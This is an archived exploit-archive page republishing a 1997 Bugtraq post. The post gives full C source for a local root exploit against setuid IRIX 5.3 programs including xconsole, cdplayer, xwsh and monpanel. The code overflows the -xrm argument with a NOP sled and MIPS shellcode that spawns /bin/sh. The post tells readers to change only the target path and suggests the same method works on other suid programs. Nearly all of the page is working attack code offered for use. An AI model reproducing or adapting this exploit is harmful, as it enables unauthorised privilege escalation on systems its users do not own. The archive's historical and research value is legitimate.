Overflows in IRIX /usr/sbin/X11/xconsole, /usr/sbin/X11/cdplayer, /usr/sbin/xwsh, and /usr/sbin/monpanel.

Summary
Description:As he mentions, there must be some bad IRIX library which is causing all of these IRIX progs to overflow. Anyway, this is a standard overflow which works on all of the above.
Author:"Patrick J. Paulus" <pjp@STEPAHEAD.NET> posted the exploit which was a _very_ slighty modified version of David Hedley's code posted earlier.
Compromise: root (local)
Vulnerable Systems:IRIX 5.3, probably 6.x
Date:27 May 1997
Notes:Someone reported to me that he couldn't get these to work. Has anyone used them successfully?
Details


Date: Tue, 27 May 1997 13:25:55 -0200
From: "Patrick J. Paulus" <pjp@STEPAHEAD.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: A few more IRIX Buffer Overflows

Greets,

        The code that follows this text, written by David Hedley, can be
used to exploit various other programs just the same. He suggested that
they probably use a shared librarry, seems that that may be so. I've been
looking through around and trying some things. Here are some more that can
be exploited in the same manner:

NOTE: This has only been tested on an Indy R4600 IRIX 5.3

/usr/sbin/X11/xconsole
/usr/sbin/X11/cdplayer
/usr/sbin/xwsh (requires argument of "4")
/usr/sbin/monpanel

The only thing you'll have to modify in the following code is the PATH and
the PATH_PROG variables. I'm sure with bigger  modfications of this code
you can exploit virtually anything suid. If it doesn't seem to work of
gives you a   "Bus Error" then try using the "4" argument that Mr Hedley
suggested. Reports of any other finds would be appreciated, Thanks

========Cut Here=======
/* Exploit by David Hedley <hedley@cs.bris.ac.uk>
 * 27/5/97
 *
 * _very_ slighty modified by Patrick J..Paulus <pjp@stepahead.net>
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES 500
#define BUF_LENGTH 500
#define EXTRA 9000
#define OFFSET  0x180    /* 0x184 for Irix 6.x */
#define GP_OFFSET       -0x80
#define IRIX_NOP        0x03e0f825 /* move $ra,$ra */
#define PATH_PROG        "/usr/bin/X11/xconsole" /* path & program name */
#define PROG            "xconsole" /* program */

#define u_long unsigned

u_long get_sp_code[] = {
    0x03a01025, /* move $v0,$sp */
    0x03e00008, /* jr $ra */
    0x00000000, /* nop */ };

u_long irix_shellcode[] = {
    0x24041234, /* li $4,0x1234 */
    0x2084edcc, /* sub $4,0x1234 */
    0x0491fffe, /* bgezal $4,pc-4 */
    0x03bd302a, /* sgt $6,$sp,$sp */
    0x03bd202a, /* sgt $4,$sp,$sp */
    0x240203ff, /* li $v0,1023 */
    0x03ffffcc, /* syscall 0xfffff */
    0x23e40138, /* addi $4,$31,264+48 */
    0xa086feff, /* sb $6,-264+7($4)  */
    0x2084fef8, /* sub $4,264 */
    0x20850110, /* addi $5,$4,264+8 */
    0xaca4fef8, /* sw $4,-264($5)  */
    0xaca6fefc, /* sw $4,-260($5)  */
    0x20a5fef8, /* sub $5, 264 */
    0x240203f3, /* li $v0,1011 */
    0x03ffffcc, /* syscall 0xfffff */
    0x2f62696e, /* "/bin"  */
    0x2f7368ff, /* "/sh"  */ };

char buf[NUM_ADDRESSES+BUF_LENGTH + EXTRA + 8];

void main(int argc, char **argv)  {
    char *env[] = {NULL};
    u_long targ_addr, stack, tmp;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-32' option\n");
        exit(1);
    }

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]);

    tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

    while ((tmp & 0xff000000) == 0 ||
           (tmp & 0x00ff0000) == 0 ||
           (tmp & 0x0000ff00) == 0 ||
           (tmp & 0x000000ff) == 0)
        tmp += 4;

    for (i = 0; i < NUM_ADDRESSES/(4*sizeof(u_long)); i++) {
        *long_p++ = tmp;
        *long_p++ = tmp;
        *long_p++ = targ_addr;
        *long_p++ = targ_addr;
    }

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (tmp >> 8) | (tmp << 24);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle(PATH_PROG, PROG, "-xrm", &buf[2], 0, env);
    perror("execl failed");
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]